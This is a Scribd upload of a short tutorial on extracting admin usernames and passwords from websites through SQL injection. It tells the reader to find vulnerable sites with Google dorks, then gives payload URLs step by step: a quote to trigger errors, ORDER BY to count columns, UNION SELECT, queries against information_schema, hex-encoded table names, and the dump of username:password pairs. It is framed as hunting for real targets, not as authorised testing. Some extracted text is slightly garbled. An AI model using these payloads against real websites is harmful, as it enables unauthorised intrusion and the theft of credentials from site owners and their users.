Scribd Logo
Upload

Welcome to Scribd!

  • SQL Injection Manual Short Tutorial

    Uploaded by

    milesgelidus
    349 views2 pages
    d

    Original Title

    186683028 SQL Injection Manual Short Tutorial

    Copyright

    © Attribution Non-Commercial (BY-NC)

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    d

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    349 views2 pages

    SQL Injection Manual Short Tutorial

    Uploaded by

    milesgelidus
    d

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 2

    Hello guys, I will teach you Step-by-Step on how to get admin user/pass and othe r infos.

    from a website using simple SQL Injection. Step1: Find vulnerable site using google dork Sample Dork: inurl:index.php?id= inurl:readnews.php?ID= inurl:trainers.php?id= Ex: http://www.site.com/index.php?id=1 Step2: Add a (') of the URL. http://www.site.com/index.php?id=1<SQLi> Ex: http://www.site.com/index.php?id=1' (Note: If the page comes out with with SQL error, so that means the site is vuln erable to SQLi. If loads normally, move to the next target site.) Typical Error: Warning: mysql_fetch_array(): Warning: mysql_fetch_assoc(): Warning: mysql_numrows(): Warning: mysql_num_rows(): Warning: mysql_result(): Warning: mysql_preg_match(): Step3: Find the number of columns. http://www.site.com/index.php?id=1 order by 5-- (Error) Formula: # of columns = 1stErrorPage - 1 so that means if we used the formula, # of columns = 5 - 1 = "4 # of columns" Ex: http://www.site.com/index.php?id=1 order by 4-Typical Error: Unknown column '<#>' in 'order clause' Step4: Add UNION SELECT Statement on the URL and '-' after equal '=' sign, we on ly have 4 # of columns so the output comes with this: Ex: http://www.site.com/index.php?id=1 union select 1,2,3,4-Step5: Find the SQL Version command: version() or @@version Ex:

    http://www.site.com/index.php?id=1 union select 1,version(),3,4-(Note: If the SQL version is equal or greater than 5 '5.1.66-0', so that means t he site is vulnerable. If version equal or less than 4, move to the next target site.) Step5: Get the Tables Ex: http://www.site.com/index.php?id=1 union select 1,group_concat(table_name),3,4 f rom information_schema.tables where table_schema=database()-Sample Result: category,employee,product,users Step6: Now find 'user/s','admin' etc. If we find users, get the users columns. But before that convert 'users' to hex go to Text to Hex Converter Online http://www.swingnote.com/tools/texttohex.php users = 7573657273 (hex) Insert this on table_name=0x<hex> http://www.site.com/index.php?id=1 union select 1,group_concat(column_name),3,4 from information schema.columns where table_name=0x<hex>-Ex: http://www.site.com/index.php?id=1 union select 1,group_concat(column_name),3,4 from information schema.columns where table_name=0x7573657273-Sample Result: password,userID,username Step7: Extract information Optional: Add 0x3a, 0x3a is the hexadecimal value for ':' Ex: http://www.site.com/index.php?id=1 union select 1,group_concat(username,0x3a,pas sword),3,4 from users-Happy Hunting ^_^ ~PHC_Ast3Risk ~Stawhat-Chopper

    You might also like